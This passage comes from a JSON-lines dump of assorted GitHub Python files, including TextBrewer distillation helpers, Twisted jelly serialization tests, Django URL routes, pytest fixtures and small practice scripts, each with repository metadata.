abc.Mapping):\n return {key: move_to_device(value,device) for key, value in batch.items()}\n else:\n return batch\n\ndef get_outputs_from_batch(batch, device, model_T, model_S, args, no_teacher_forward=False):\n if isinstance(batch, abc.Mapping):\n if 'teacher' in batch and 'student' in batch:\n teacher_batch = batch['teacher']\n student_batch = batch['student']\n teacher_batch = move_to_device(teacher_batch, device)\n #teacher outputs\n if no_teacher_forward is True:\n results_T = None\n else:\n if 'teacher_cache' in batch:\n results_T = move_to_device(batch['teacher_cache'],device)\n else:\n with torch.no_grad():\n results_T = auto_forward(model_T,teacher_batch,args)\n #student outputs\n student_batch = move_to_device(student_batch, device)\n if isinstance(student_batch, abc.Mapping):\n results_S = model_S(**student_batch, **args)\n else:\n results_S = model_S(*student_batch, **args)\n else:\n batch = move_to_device(batch,device)\n if no_teacher_forward is True:\n results_T = None\n else:\n with torch.no_grad():\n results_T = auto_forward(model_T,batch,args)\n results_S = model_S(**batch, **args)\n teacher_batch = student_batch = batch\n else:\n batch = move_to_device(batch,device)\n if no_teacher_forward is True:\n results_T = None\n else:\n with torch.no_grad():\n results_T = auto_forward(model_T,batch,args)\n results_S = model_S(*batch, **args)\n teacher_batch = student_batch = batch\n \n return (teacher_batch,results_T), (student_batch,results_S)\n\ndef auto_forward(model,batch,args):\n if isinstance(batch, abc.Mapping):\n if isinstance(model,(list,tuple)):\n results = [v(**batch, **args) for v in model]\n elif isinstance(model,dict):\n results = {k:v(**batch, **args) for k,v in model.items()}\n else:\n results = model(**batch, **args)\n else:\n if isinstance(model,(list,tuple)):\n results = [v(*batch, **args) for v in model]\n elif isinstance(model,dict):\n results = {k:v(*batch, **args) for k,v in model.items()}\n else:\n results = model(*batch, **args)\n return 
results\n","repo_name":"airaria/TextBrewer","sub_path":"src/textbrewer/distiller_utils.py","file_name":"distiller_utils.py","file_ext":"py","file_size_in_byte":11213,"program_lang":"python","lang":"en","doc_type":"code","stars":1490,"dataset":"github-code","pt":"3"} +{"seq_id":"16233383998","text":"\"\"\"PyTest fixtures for func tests in data_io.\"\"\"\n\nfrom pathlib import Path\n\nimport numpy as np\nimport pytest\n\nimport rimseval\n\n\n@pytest.fixture\ndef mpa4a_data_ascii():\n \"\"\"Provide data for the MCS6 TDC, header states [MPA4A] format.\n\n Provide data in ASCII format, also provide the correct formatting and channel that\n contains data.\n\n :return: A tuple with channel, format, and data\n :rtype: (int, DataFormat, list)\n \"\"\"\n channel = 4\n fmt = rimseval.lst_processor.LST2CRD.ASCIIFormat.ASCII_1A\n data = [\n \"000200b95a54\",\n \"000300b95a54\",\n \"000400b95a64\",\n \"000500b95a64\",\n \"000600b95a54\",\n \"000700b95a64\",\n \"000800b95a54\",\n \"000900b95a64\",\n \"000a00b95a54\",\n ]\n return channel, fmt, data\n\n\n@pytest.fixture\ndef crdproc_int(crd_file) -> rimseval.processor.CRDFileProcessor:\n \"\"\"Provide a dummy CRDProcessor file with integrals.\n\n :param crd_file: Fixture for crd file return.\n\n :return: Dummy CRDProcessor file with integrals.\n \"\"\"\n _, _, _, fname = crd_file\n crd = rimseval.processor.CRDFileProcessor(Path(fname))\n crd.spectrum_full()\n crd.def_mcal = np.array([[1, 2], [10, 20]])\n crd.mass_calibration()\n crd.def_integrals = [\"Int1\", \"Int2\"], np.array([[1, 2], [3, 4]])\n crd.integrals = np.array([[103, 104], [203, 204]])\n\n return crd\n","repo_name":"RIMS-Code/RIMSEval","sub_path":"tests/func/data_io/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74630733200","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path(\"\", views.HouseholdCreateView.as_view(), name=\"index\"),\n path(\"success\", views.SuccessView.as_view(), name=\"success\"),\n path(\"about\", views.AboutView.as_view(), name=\"about\"),\n path(\"contact\", views.ContactUsCreateView.as_view(), name=\"contact\"),\n path(\"contact/success\", views.ContactUsSuccessView.as_view(), name=\"contact_success\"),\n path(\"faqs\", views.FaqListView.as_view(), name=\"faqs\"),\n path(\"ajax/load-times\", views.load_times, name=\"ajax_load_times\"),\n]\n","repo_name":"curtis628/homevisit","sub_path":"homevisit/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9899784304","text":"n,m,x,y=map(int,input().split())\nk=y\nwhile k>0:\n print(f\"{x} {k}\") \n k-=1\n\nflag=False\ni=x\nj=y+1\nturn=1\nwhile i<=n and i>0:\n if turn==1 or turn%2!=0:\n if turn>1:\n j=1\n while j0:\n print(f\"{i} {j}\")\n j-=1\n\n turn+=1\n if flag==False:\n i+=1\n if i==n+1:\n flag =True\n i=x-1 \n elif flag:\n i-=1\n \n \n\n\n\n \n ","repo_name":"NavalPangtey/Competitive-programming","sub_path":"python/codeforce/664B.py","file_name":"664B.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31298903933","text":"from __future__ import absolute_import, division\n\nimport datetime\nimport decimal\n\nfrom twisted.python.compat import unicode\nfrom twisted.spread import jelly, pb\nfrom twisted.trial import unittest\nfrom twisted.test.proto_helpers import StringTransport\n\n\nclass TestNode(jelly.Jellyable, object):\n \"\"\"\n An object to test jellyfying of new style class instances.\n \"\"\"\n classAttr = 4\n\n def __init__(self, parent=None):\n if parent:\n self.id = parent.id + 1\n parent.children.append(self)\n else:\n self.id = 1\n self.parent = parent\n self.children = []\n\n\n\nclass A:\n \"\"\"\n Dummy class.\n \"\"\"\n\n def amethod(self):\n \"\"\"\n Method to be used in serialization tests.\n \"\"\"\n\n\n\ndef afunc(self):\n \"\"\"\n A dummy function to test function serialization.\n \"\"\"\n\n\n\nclass B:\n \"\"\"\n Dummy class.\n \"\"\"\n\n def bmethod(self):\n \"\"\"\n Method to be used in serialization tests.\n \"\"\"\n\n\n\nclass C:\n \"\"\"\n Dummy class.\n \"\"\"\n\n def cmethod(self):\n \"\"\"\n Method to be used in serialization tests.\n \"\"\"\n\n\n\nclass D(object):\n \"\"\"\n Dummy new-style class.\n \"\"\"\n\n\n\nclass E(object):\n \"\"\"\n Dummy new-style class with slots.\n \"\"\"\n\n __slots__ = (\"x\", \"y\")\n\n def __init__(self, x=None, y=None):\n self.x = x\n self.y = y\n\n\n def __getstate__(self):\n return {\"x\" : self.x, \"y\" : self.y}\n\n\n def __setstate__(self, state):\n self.x = state[\"x\"]\n self.y = state[\"y\"]\n\n\n\nclass SimpleJellyTest:\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def isTheSameAs(self, other):\n return self.__dict__ == other.__dict__\n\n\n\nclass JellyTests(unittest.TestCase):\n \"\"\"\n Testcases for L{jelly} module serialization.\n\n @cvar decimalData: serialized version of decimal data, to be used in tests.\n @type decimalData: L{list}\n \"\"\"\n decimalData = [b'list', [b'decimal', 995, -2], [b'decimal', 0, 0],\n [b'decimal', 123456, 0], [b'decimal', -78901, -3]]\n\n\n def _testSecurity(self, inputList, atom):\n \"\"\"\n Helper test method to test security options for a type.\n\n @param inputList: a sample input for the type.\n @type 
inputList: L{list}\n\n @param atom: atom identifier for the type.\n @type atom: L{str}\n \"\"\"\n c = jelly.jelly(inputList)\n taster = jelly.SecurityOptions()\n taster.allowBasicTypes()\n # By default, it should succeed\n jelly.unjelly(c, taster)\n taster.allowedTypes.pop(atom)\n # But it should raise an exception when disallowed\n self.assertRaises(jelly.InsecureJelly, jelly.unjelly, c, taster)\n\n\n def test_methodsNotSelfIdentity(self):\n \"\"\"\n If a class change after an instance has been created, L{jelly.unjelly}\n shoud raise a C{TypeError} when trying to unjelly the instance.\n \"\"\"\n a = A()\n b = B()\n c = C()\n a.bmethod = c.cmethod\n b.a = a\n savecmethod = C.cmethod\n del C.cmethod\n try:\n self.assertRaises(TypeError, jelly.unjelly, jelly.jelly(b))\n finally:\n C.cmethod = savecmethod\n\n\n def test_newStyle(self):\n \"\"\"\n Test that a new style class can be jellied and unjellied with its\n objects and attribute values preserved.\n \"\"\"\n n = D()\n n.x = 1\n n2 = D()\n n.n2 = n2\n n.n3 = n2\n c = jelly.jelly(n)\n m = jelly.unjelly(c)\n self.assertIsInstance(m, D)\n self.assertIs(m.n2, m.n3)\n self.assertEqual(m.x, 1)\n\n\n def test_newStyleWithSlots(self):\n \"\"\"\n A class defined with I{slots} can be jellied and unjellied with the\n values for its attributes preserved.\n \"\"\"\n n = E()\n n.x = 1\n c = jelly.jelly(n)\n m = jelly.unjelly(c)\n self.assertIsInstance(m, E)\n self.assertEqual(n.x, 1)\n\n\n def test_typeOldStyle(self):\n \"\"\"\n Test that an old style class type can be jellied and unjellied\n to the original type.\n \"\"\"\n t = [C]\n r = jelly.unjelly(jelly.jelly(t))\n self.assertEqual(t, r)\n\n\n def test_typeNewStyle(self):\n \"\"\"\n Test that a new style class type can be jellied and unjellied\n to the original type.\n \"\"\"\n t = [D]\n r = jelly.unjelly(jelly.jelly(t))\n self.assertEqual(t, r)\n\n\n def test_typeBuiltin(self):\n \"\"\"\n Test that a builtin type can be jellied and unjellied to the original\n type.\n \"\"\"\n t = [str]\n r = jelly.unjelly(jelly.jelly(t))\n self.assertEqual(t, r)\n\n\n def test_dateTime(self):\n \"\"\"\n Jellying L{datetime.timedelta} instances and then unjellying the result\n should produce objects which represent the values of the original\n inputs.\n \"\"\"\n dtn = datetime.datetime.now()\n dtd = datetime.datetime.now() - dtn\n inputList = [dtn, dtd]\n c = jelly.jelly(inputList)\n output = jelly.unjelly(c)\n self.assertEqual(inputList, output)\n self.assertIsNot(inputList, output)\n\n\n def test_decimal(self):\n \"\"\"\n Jellying L{decimal.Decimal} instances and then unjellying the result\n should produce objects which represent the values of the original\n inputs.\n \"\"\"\n inputList = [decimal.Decimal('9.95'),\n decimal.Decimal(0),\n decimal.Decimal(123456),\n decimal.Decimal('-78.901')]\n c = jelly.jelly(inputList)\n output = jelly.unjelly(c)\n self.assertEqual(inputList, output)\n self.assertIsNot(inputList, output)\n\n\n def test_decimalUnjelly(self):\n \"\"\"\n Unjellying the s-expressions produced by jelly for L{decimal.Decimal}\n instances should result in L{decimal.Decimal} instances with the values\n represented by the s-expressions.\n\n This test also verifies that L{decimalData} contains valid jellied\n data. 
This is important since L{test_decimalMissing} re-uses\n L{decimalData} and is expected to be unable to produce\n L{decimal.Decimal} instances even though the s-expression correctly\n represents a list of them.\n \"\"\"\n expected = [decimal.Decimal('9.95'),\n decimal.Decimal(0),\n decimal.Decimal(123456),\n decimal.Decimal('-78.901')]\n output = jelly.unjelly(self.decimalData)\n self.assertEqual(output, expected)\n\n\n def test_decimalSecurity(self):\n \"\"\"\n By default, C{decimal} objects should be allowed by\n L{jelly.SecurityOptions}. If not allowed, L{jelly.unjelly} should raise\n L{jelly.InsecureJelly} when trying to unjelly it.\n \"\"\"\n inputList = [decimal.Decimal('9.95')]\n self._testSecurity(inputList, b\"decimal\")\n\n\n def test_set(self):\n \"\"\"\n Jellying C{set} instances and then unjellying the result\n should produce objects which represent the values of the original\n inputs.\n \"\"\"\n inputList = [set([1, 2, 3])]\n output = jelly.unjelly(jelly.jelly(inputList))\n self.assertEqual(inputList, output)\n self.assertIsNot(inputList, output)\n\n\n def test_frozenset(self):\n \"\"\"\n Jellying L{frozenset} instances and then unjellying the result\n should produce objects which represent the values of the original\n inputs.\n \"\"\"\n inputList = [frozenset([1, 2, 3])]\n output = jelly.unjelly(jelly.jelly(inputList))\n self.assertEqual(inputList, output)\n self.assertIsNot(inputList, output)\n\n\n def test_setSecurity(self):\n \"\"\"\n By default, C{set} objects should be allowed by\n L{jelly.SecurityOptions}. If not allowed, L{jelly.unjelly} should raise\n L{jelly.InsecureJelly} when trying to unjelly it.\n \"\"\"\n inputList = [set([1, 2, 3])]\n self._testSecurity(inputList, b\"set\")\n\n\n def test_frozensetSecurity(self):\n \"\"\"\n By default, L{frozenset} objects should be allowed by\n L{jelly.SecurityOptions}. 
If not allowed, L{jelly.unjelly} should raise\n L{jelly.InsecureJelly} when trying to unjelly it.\n \"\"\"\n inputList = [frozenset([1, 2, 3])]\n self._testSecurity(inputList, b\"frozenset\")\n\n\n def test_oldSets(self):\n \"\"\"\n Test jellying C{sets.Set}: it should serialize to the same thing as\n C{set} jelly, and be unjellied as C{set} if available.\n \"\"\"\n inputList = [jelly._sets.Set([1, 2, 3])]\n inputJelly = jelly.jelly(inputList)\n self.assertEqual(inputJelly, jelly.jelly([set([1, 2, 3])]))\n output = jelly.unjelly(inputJelly)\n # Even if the class is different, it should coerce to the same list\n self.assertEqual(list(inputList[0]), list(output[0]))\n if set is jelly._sets.Set:\n self.assertIsInstance(output[0], jelly._sets.Set)\n else:\n self.assertIsInstance(output[0], set)\n\n if not jelly._sets:\n test_oldSets.skip = \"sets.Set is gone in Python 3 and higher\"\n\n\n def test_oldImmutableSets(self):\n \"\"\"\n Test jellying C{sets.ImmutableSet}: it should serialize to the same\n thing as L{frozenset} jelly, and be unjellied as L{frozenset} if\n available.\n \"\"\"\n inputList = [jelly._sets.ImmutableSet([1, 2, 3])]\n inputJelly = jelly.jelly(inputList)\n self.assertEqual(inputJelly, jelly.jelly([frozenset([1, 2, 3])]))\n output = jelly.unjelly(inputJelly)\n # Even if the class is different, it should coerce to the same list\n self.assertEqual(list(inputList[0]), list(output[0]))\n if frozenset is jelly._sets.ImmutableSet:\n self.assertIsInstance(output[0], jelly._sets.ImmutableSet)\n else:\n self.assertIsInstance(output[0], frozenset)\n\n if not jelly._sets:\n test_oldImmutableSets.skip = (\n \"sets.ImmutableSets is gone in Python 3 and higher\")\n\n\n def test_simple(self):\n \"\"\"\n Simplest test case.\n \"\"\"\n self.assertTrue(SimpleJellyTest('a', 'b').isTheSameAs(\n SimpleJellyTest('a', 'b')))\n a = SimpleJellyTest(1, 2)\n cereal = jelly.jelly(a)\n b = jelly.unjelly(cereal)\n self.assertTrue(a.isTheSameAs(b))\n\n\n def test_identity(self):\n \"\"\"\n Test to make sure that objects retain identity properly.\n \"\"\"\n x = []\n y = (x)\n x.append(y)\n x.append(y)\n self.assertIs(x[0], x[1])\n self.assertIs(x[0][0], x)\n s = jelly.jelly(x)\n z = jelly.unjelly(s)\n self.assertIs(z[0], z[1])\n self.assertIs(z[0][0], z)\n\n\n def test_unicode(self):\n x = unicode('blah')\n y = jelly.unjelly(jelly.jelly(x))\n self.assertEqual(x, y)\n self.assertEqual(type(x), type(y))\n\n\n def test_stressReferences(self):\n reref = []\n toplevelTuple = ({'list': reref}, reref)\n reref.append(toplevelTuple)\n s = jelly.jelly(toplevelTuple)\n z = jelly.unjelly(s)\n self.assertIs(z[0]['list'], z[1])\n self.assertIs(z[0]['list'][0], z)\n\n\n def test_moreReferences(self):\n a = []\n t = (a,)\n a.append((t,))\n s = jelly.jelly(t)\n z = jelly.unjelly(s)\n self.assertIs(z[0][0][0], z)\n\n\n def test_typeSecurity(self):\n \"\"\"\n Test for type-level security of serialization.\n \"\"\"\n taster = jelly.SecurityOptions()\n dct = jelly.jelly({})\n self.assertRaises(jelly.InsecureJelly, jelly.unjelly, dct, taster)\n\n\n def test_newStyleClasses(self):\n uj = jelly.unjelly(D)\n self.assertIs(D, uj)\n\n\n def test_lotsaTypes(self):\n \"\"\"\n Test for all types currently supported in jelly\n \"\"\"\n a = A()\n jelly.unjelly(jelly.jelly(a))\n jelly.unjelly(jelly.jelly(a.amethod))\n items = [afunc, [1, 2, 3], not bool(1), bool(1), 'test', 20.3,\n (1, 2, 3), None, A, unittest, {'a': 1}, A.amethod]\n for i in items:\n self.assertEqual(i, jelly.unjelly(jelly.jelly(i)))\n\n\n def test_setState(self):\n 
global TupleState\n class TupleState:\n def __init__(self, other):\n self.other = other\n def __getstate__(self):\n return (self.other,)\n def __setstate__(self, state):\n self.other = state[0]\n def __hash__(self):\n return hash(self.other)\n a = A()\n t1 = TupleState(a)\n t2 = TupleState(a)\n t3 = TupleState((t1, t2))\n d = {t1: t1, t2: t2, t3: t3, \"t3\": t3}\n t3prime = jelly.unjelly(jelly.jelly(d))[\"t3\"]\n self.assertIs(t3prime.other[0].other, t3prime.other[1].other)\n\n\n def test_classSecurity(self):\n \"\"\"\n Test for class-level security of serialization.\n \"\"\"\n taster = jelly.SecurityOptions()\n taster.allowInstancesOf(A, B)\n a = A()\n b = B()\n c = C()\n # add a little complexity to the data\n a.b = b\n a.c = c\n # and a backreference\n a.x = b\n b.c = c\n # first, a friendly insecure serialization\n friendly = jelly.jelly(a, taster)\n x = jelly.unjelly(friendly, taster)\n self.assertIsInstance(x.c, jelly.Unpersistable)\n # now, a malicious one\n mean = jelly.jelly(a)\n self.assertRaises(jelly.InsecureJelly, jelly.unjelly, mean, taster)\n self.assertIs(x.x, x.b, \"Identity mismatch\")\n # test class serialization\n friendly = jelly.jelly(A, taster)\n x = jelly.unjelly(friendly, taster)\n self.assertIs(x, A, \"A came back: %s\" % x)\n\n\n def test_unjellyable(self):\n \"\"\"\n Test that if Unjellyable is used to deserialize a jellied object,\n state comes out right.\n \"\"\"\n class JellyableTestClass(jelly.Jellyable):\n pass\n jelly.setUnjellyableForClass(JellyableTestClass, jelly.Unjellyable)\n input = JellyableTestClass()\n input.attribute = 'value'\n output = jelly.unjelly(jelly.jelly(input))\n self.assertEqual(output.attribute, 'value')\n self.assertIsInstance(output, jelly.Unjellyable)\n\n\n def test_persistentStorage(self):\n perst = [{}, 1]\n def persistentStore(obj, jel, perst = perst):\n perst[1] = perst[1] + 1\n perst[0][perst[1]] = obj\n return str(perst[1])\n\n def persistentLoad(pidstr, unj, perst = perst):\n pid = int(pidstr)\n return perst[0][pid]\n\n a = SimpleJellyTest(1, 2)\n b = SimpleJellyTest(3, 4)\n c = SimpleJellyTest(5, 6)\n\n a.b = b\n a.c = c\n c.b = b\n\n jel = jelly.jelly(a, persistentStore = persistentStore)\n x = jelly.unjelly(jel, persistentLoad = persistentLoad)\n\n self.assertIs(x.b, x.c.b)\n self.assertTrue(perst[0], \"persistentStore was not called.\")\n self.assertIs(x.b, a.b, \"Persistent storage identity failure.\")\n\n\n def test_newStyleClassesAttributes(self):\n n = TestNode()\n n1 = TestNode(n)\n TestNode(n1)\n TestNode(n)\n # Jelly it\n jel = jelly.jelly(n)\n m = jelly.unjelly(jel)\n # Check that it has been restored ok\n self._check_newstyle(n, m)\n\n\n def _check_newstyle(self, a, b):\n self.assertEqual(a.id, b.id)\n self.assertEqual(a.classAttr, 4)\n self.assertEqual(b.classAttr, 4)\n self.assertEqual(len(a.children), len(b.children))\n for x, y in zip(a.children, b.children):\n self._check_newstyle(x, y)\n\n\n def test_referenceable(self):\n \"\"\"\n A L{pb.Referenceable} instance jellies to a structure which unjellies to\n a L{pb.RemoteReference}. 
The C{RemoteReference} has a I{luid} that\n matches up with the local object key in the L{pb.Broker} which sent the\n L{Referenceable}.\n \"\"\"\n ref = pb.Referenceable()\n jellyBroker = pb.Broker()\n jellyBroker.makeConnection(StringTransport())\n j = jelly.jelly(ref, invoker=jellyBroker)\n\n unjellyBroker = pb.Broker()\n unjellyBroker.makeConnection(StringTransport())\n\n uj = jelly.unjelly(j, invoker=unjellyBroker)\n self.assertIn(uj.luid, jellyBroker.localObjects)\n\n\n\nclass JellyDeprecationTests(unittest.TestCase):\n \"\"\"\n Tests for deprecated Jelly things\n \"\"\"\n\n def test_deprecatedInstanceAtom(self):\n \"\"\"\n L{jelly.instance_atom} is deprecated since 15.0.0.\n \"\"\"\n jelly.instance_atom\n warnings = self.flushWarnings([self.test_deprecatedInstanceAtom])\n self.assertEqual(len(warnings), 1)\n self.assertEqual(\n warnings[0]['message'],\n 'twisted.spread.jelly.instance_atom was deprecated in Twisted '\n '15.0.0: instance_atom is unused within Twisted.')\n self.assertEqual(\n warnings[0]['category'],\n DeprecationWarning)\n\n\n def test_deprecatedUnjellyingInstanceAtom(self):\n \"\"\"\n Unjellying the instance atom is deprecated with 15.0.0.\n \"\"\"\n jelly.unjelly(\n [\"instance\",\n [\"class\", \"twisted.spread.test.test_jelly.A\"],\n [\"dictionary\"]])\n warnings = self.flushWarnings()\n self.assertEqual(len(warnings), 1)\n self.assertEqual(\n warnings[0]['message'],\n \"Unjelly support for the instance atom is deprecated since \"\n \"Twisted 15.0.0. Upgrade peer for modern instance support.\")\n self.assertEqual(\n warnings[0]['category'],\n DeprecationWarning)\n\n\n\nclass ClassA(pb.Copyable, pb.RemoteCopy):\n def __init__(self):\n self.ref = ClassB(self)\n\n\n\nclass ClassB(pb.Copyable, pb.RemoteCopy):\n def __init__(self, ref):\n self.ref = ref\n\n\n\nclass CircularReferenceTests(unittest.TestCase):\n \"\"\"\n Tests for circular references handling in the jelly/unjelly process.\n \"\"\"\n\n def test_simpleCircle(self):\n jelly.setUnjellyableForClass(ClassA, ClassA)\n jelly.setUnjellyableForClass(ClassB, ClassB)\n a = jelly.unjelly(jelly.jelly(ClassA()))\n self.assertIs(a.ref.ref, a,\n \"Identity not preserved in circular reference\")\n\n\n def test_circleWithInvoker(self):\n class DummyInvokerClass:\n pass\n dummyInvoker = DummyInvokerClass()\n dummyInvoker.serializingPerspective = None\n a0 = ClassA()\n jelly.setUnjellyableForClass(ClassA, ClassA)\n jelly.setUnjellyableForClass(ClassB, ClassB)\n j = jelly.jelly(a0, invoker=dummyInvoker)\n a1 = jelly.unjelly(j)\n self.failUnlessIdentical(a1.ref.ref, a1,\n \"Identity not preserved in circular reference\")\n\n\n def test_set(self):\n \"\"\"\n Check that a C{set} can contain a circular reference and be serialized\n and unserialized without losing the reference.\n \"\"\"\n s = set()\n a = SimpleJellyTest(s, None)\n s.add(a)\n res = jelly.unjelly(jelly.jelly(a))\n self.assertIsInstance(res.x, set)\n self.assertEqual(list(res.x), [res])\n\n\n def test_frozenset(self):\n \"\"\"\n Check that a L{frozenset} can contain a circular reference and be\n serialized and unserialized without losing the reference.\n \"\"\"\n a = SimpleJellyTest(None, None)\n s = frozenset([a])\n a.x = s\n res = jelly.unjelly(jelly.jelly(a))\n self.assertIsInstance(res.x, frozenset)\n self.assertEqual(list(res.x), 
[res])\n","repo_name":"wistbean/learn_python3_spider","sub_path":"stackoverflow/venv/lib/python3.6/site-packages/twisted/spread/test/test_jelly.py","file_name":"test_jelly.py","file_ext":"py","file_size_in_byte":19862,"program_lang":"python","lang":"en","doc_type":"code","stars":14022,"dataset":"github-code","pt":"3"} +{"seq_id":"71339530643","text":"# Exercício 8.16 - Livro\n\ndef isPrimo(valor=0):\n if valor < 2:\n return False\n else:\n divisor = 1\n cont_divisor = 0\n while divisor <= valor:\n if valor % divisor == 0:\n cont_divisor += 1\n divisor += 1\n if cont_divisor > 2:\n return False\n else:\n return True\n\ndef numeroPrimo(total=0):\n valor = 1\n while True:\n if total < 1:\n break\n if isPrimo(valor):\n yield valor\n total -= 1\n valor += 1\nnumP = numeroPrimo(20)\nprint([num for num in numP])\n","repo_name":"josevini/python","sub_path":"Introdução à Programação/capitulo8/ex_8-16.py","file_name":"ex_8-16.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29255932237","text":"from maps.doc.proto.testhelper.validator import Validator\nfrom yandex.maps.proto.search.business_pb2 import ResponseMetadata\nimport math\n\nvalidator = Validator('search')\n\n\ndef test_range_filters():\n message = ResponseMetadata()\n\n f = message.filter.add()\n f.id = 'hotel_reservation'\n f.name = 'Hotel reservation dates'\n f.date_filter.SetInParent()\n\n f = message.filter.add()\n f.id = 'price_room_range'\n f.name = 'Цена проживания за ночь'\n setattr(f.range_filter, 'from', 4000)\n f.range_filter.to = 20000\n\n f = message.filter.add()\n f.id = 'rating_range'\n f.name = 'Рейтинг организации'\n setattr(f.range_filter, 'from', 0)\n f.range_filter.to = 5\n\n f = message.filter.add()\n f.id = 'number_of_lanes'\n f.name = 'Количество дорожек (недоступный признак)'\n f.disabled = True\n setattr(f.range_filter, 'from', math.nan)\n f.range_filter.to = math.nan\n\n validator.validate_example(message, 'range_filters')\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/test_range_filters.py","file_name":"test_range_filters.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3863440600","text":"def joint():\r\n a = \"Hello\"\r\n b = \"World\"\r\n c = \"I am\"\r\n d = \"Tanishka\"\r\n e = \"I am at\"\r\n f = \"Bangalore\"\r\n #g = (a +\" \"+ b)\r\n #print(g)\r\n # h = \"%s %s\"%(c,d)\r\n # print(h)\r\n i=\" \".join([e,f])\r\n print(i)\r\njoint()","repo_name":"Tanish456/Python","sub_path":"practicejjointstring.py","file_name":"practicejjointstring.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17854937604","text":"def get_badElectrodes(path=\"C:/Users/sound/Downloads/m24_load_javier/\"):\n fname = \"bad_electrodes.csv\"\n with open(path+fname,\"r\") as f:\n lines = f.readlines()\n bad = []\n for l in lines[1:]:\n x = l.strip()\n if x[0] == \"#\":\n continue\n bad.append(x)\n return bad\n","repo_name":"soundingreen/professional-internship-historical","sub_path":"m24_load_javier_vFINAL/m24_aux.py","file_name":"m24_aux.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"35078579727","text":"import os, sys\n\nfrom setuptools import setup, find_packages\n\nbase_dir = 
os.path.dirname(__file__)\n\nsetup(\n name='picky',\n version='0.9.2',\n author='Chris Withers',\n author_email='chris@simplistix.co.uk',\n license='MIT',\n description=(\n \"A tool for checking versions of packages used by conda or pip \"\n \"are as specified in their requirements files.\"\n ),\n long_description=open(os.path.join(base_dir,'docs','description.rst')).read(),\n url='https://github.com/Simplistix/picky',\n classifiers=[],\n zip_safe=False,\n include_package_data=True,\n extras_require={\n 'build': ['sphinx', 'pkginfo', 'setuptools-git', 'twine', 'wheel']\n},\n)\n","repo_name":"simplistix/picky","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"12598688203","text":"\"\"\"\nTests for util.date_utils\n\"\"\"\n\nimport unittest\nfrom datetime import datetime, timedelta, tzinfo\nfrom unittest.mock import patch\n\nimport crum\nimport ddt\nimport pytest\nfrom markupsafe import Markup\nfrom pytz import utc\n\nfrom django.test.client import RequestFactory\n\nfrom common.djangoapps.util.date_utils import (\n almost_same_datetime, get_default_time_display, get_time_display, strftime_localized, strftime_localized_html\n)\n\n\ndef test_get_default_time_display():\n assert get_default_time_display(None) == \"\"\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=utc)\n assert get_default_time_display(test_time) == \"Mar 12, 1992 at 15:03 UTC\"\n\n\ndef test_get_dflt_time_disp_notz():\n test_time = datetime(1992, 3, 12, 15, 3, 30)\n assert get_default_time_display(test_time) == \"Mar 12, 1992 at 15:03 UTC\"\n\n\ndef test_get_time_disp_ret_empty():\n assert get_time_display(None) == \"\"\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=utc)\n assert get_time_display(test_time, \"\") == \"\"\n\n\ndef test_get_time_display():\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=utc)\n assert get_time_display(test_time, 'dummy text') == \"dummy text\"\n assert get_time_display(test_time, '%b %d %Y') == \"Mar 12 1992\"\n assert get_time_display(test_time, '%b %d %Y %Z') == \"Mar 12 1992 UTC\"\n assert get_time_display(test_time, '%b %d %H:%M') == \"Mar 12 15:03\"\n\n\ndef test_get_time_pass_through():\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=utc)\n assert get_time_display(test_time) == \"Mar 12, 1992 at 15:03 UTC\"\n assert get_time_display(test_time, None) == \"Mar 12, 1992 at 15:03 UTC\"\n assert get_time_display(test_time, \"%\") == \"Mar 12, 1992 at 15:03 UTC\"\n\n\ndef test_get_time_display_coerce():\n test_time_standard = datetime(1992, 1, 12, 15, 3, 30, tzinfo=utc)\n test_time_daylight = datetime(1992, 7, 12, 15, 3, 30, tzinfo=utc)\n assert get_time_display(test_time_standard, None, coerce_tz=\"US/Pacific\") == \"Jan 12, 1992 at 07:03 PST\"\n assert get_time_display(test_time_standard, None, coerce_tz=\"NONEXISTENTTZ\") == \"Jan 12, 1992 at 15:03 UTC\"\n assert get_time_display(test_time_standard, '%b %d %H:%M', coerce_tz=\"US/Pacific\") == \"Jan 12 07:03\"\n assert get_time_display(test_time_daylight, None, coerce_tz=\"US/Pacific\") == \"Jul 12, 1992 at 08:03 PDT\"\n assert get_time_display(test_time_daylight, None, coerce_tz=\"NONEXISTENTTZ\") == \"Jul 12, 1992 at 15:03 UTC\"\n assert get_time_display(test_time_daylight, '%b %d %H:%M', coerce_tz=\"US/Pacific\") == \"Jul 12 08:03\"\n\n\nclass NamelessTZ(tzinfo): # lint-amnesty, pylint: disable=abstract-method\n \"\"\"Static timezone for testing\"\"\"\n\n def utcoffset(self, 
